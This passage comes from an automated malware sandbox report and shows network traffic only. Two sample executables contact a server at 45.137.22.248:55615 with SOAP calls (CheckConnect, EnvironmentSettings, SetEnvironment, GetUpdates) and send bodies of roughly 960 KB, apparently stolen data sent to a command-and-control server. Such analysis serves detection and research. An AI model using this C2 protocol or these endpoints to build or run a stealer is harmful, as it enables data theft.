                                                        Nov 4, 2024 04:32:25.707525969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707560062 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707623959 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707633972 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707643032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707709074 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707717896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707772970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707791090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707799911 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707809925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707817078 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707910061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707918882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707926989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707936049 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707945108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707953930 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707962990 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707972050 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707981110 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.707988977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708004951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708014965 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708030939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708034992 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708091974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708101034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708116055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708123922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708180904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708189964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708218098 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708226919 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708267927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708276987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708286047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708323002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708333969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708364010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708373070 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708380938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708395958 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708405018 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708535910 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708544970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708554983 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708564043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708570957 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708580971 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708589077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708597898 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708606005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708614111 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708627939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708636999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708643913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708652973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708662033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708668947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708679914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708688974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708776951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708786011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708794117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708802938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708811045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708821058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708828926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708837986 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708901882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708910942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708919048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708928108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708935976 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708944082 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708951950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708961010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708969116 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.708977938 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709029913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709039927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709048033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709057093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709064960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709074020 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709081888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709090948 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709100008 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709108114 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709155083 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709163904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709172010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709182024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709201097 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709281921 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709291935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709300995 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709372044 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709381104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709422112 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709491968 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709613085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709621906 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709638119 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709645987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709719896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709728956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709774017 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709783077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709793091 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709870100 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709913969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.709923029 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710084915 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710294008 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710460901 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710576057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.710817099 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711013079 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711149931 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711348057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711549997 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.711724043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.721792936 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:26.085789919 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:26.097728014 CET4983755615192.168.2.645.137.22.248

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 4, 2024 04:32:10.253213882 CET5897453192.168.2.61.1.1.1

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 4, 2024 04:32:10.253213882 CET192.168.2.61.1.1.10x6826Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 4, 2024 04:32:10.260335922 CET1.1.1.1192.168.2.60x6826No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 45.137.22.248:55615

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.64971845.137.22.248556156724C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 04:32:03.811441898 CET240OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Nov 4, 2024 04:32:04.621860027 CET359INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:03 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:09.769223928 CET223OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:10.039082050 CET1236INHTTP/1.1 200 OK
                                                        Content-Length: 8064
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:08 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>139.186.206.86</b:string><b:string>112.244.133.106</b:string><b:string>113.100.145.59</b:string><b:string>14.19.28.125</b:string><b:string>36.143.61.93</b:string><b:string>120.229.169.226</b:string><b:string>27.214.63.21</b:string><b:string>125.94.23.107</b:string><b:string>114.95.213.233</b:string><b:string>219.137.198.172</b:string><b:string>84.57.190.182</b:string><b:string>113.78.94.204</b:string><b:string>125.123.233.96</b:string><b:string>113.68.110.168</b:string><b:string>172.174.62.166</b:string><b:string>103.149.33.156</b:string><b:string>121.226.48.220</b:string><b:string>14.221.49. [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.64977745.137.22.248556156724C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 04:32:13.528331041 CET221OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 960380
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:15.493941069 CET294INHTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:15.497076988 CET217OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 960372
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:15.905955076 CET408INHTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.64978445.137.22.248556157568C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 04:32:14.330665112 CET240OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Nov 4, 2024 04:32:15.172902107 CET25INHTTP/1.1 100 Continue
                                                        Nov 4, 2024 04:32:15.174155951 CET359INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:14 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:20.278641939 CET223OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:20.533976078 CET25INHTTP/1.1 100 Continue
                                                        Nov 4, 2024 04:32:20.816849947 CET1236INHTTP/1.1 200 OK
                                                        Content-Length: 8064
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:19 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>139.186.206.86</b:string><b:string>112.244.133.106</b:string><b:string>113.100.145.59</b:string><b:string>14.19.28.125</b:string><b:string>36.143.61.93</b:string><b:string>120.229.169.226</b:string><b:string>27.214.63.21</b:string><b:string>125.94.23.107</b:string><b:string>114.95.213.233</b:string><b:string>219.137.198.172</b:string><b:string>84.57.190.182</b:string><b:string>113.78.94.204</b:string><b:string>125.123.233.96</b:string><b:string>113.68.110.168</b:string><b:string>172.174.62.166</b:string><b:string>103.149.33.156</b:string><b:string>121.226.48.220</b:string><b:string>14.221.49. [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.64983745.137.22.248556157568C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 04:32:23.738605022 CET221OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 959930
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:25.678739071 CET294INHTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:24 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:25.690970898 CET217OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 959922
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:26.085789919 CET408INHTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:24 GMT
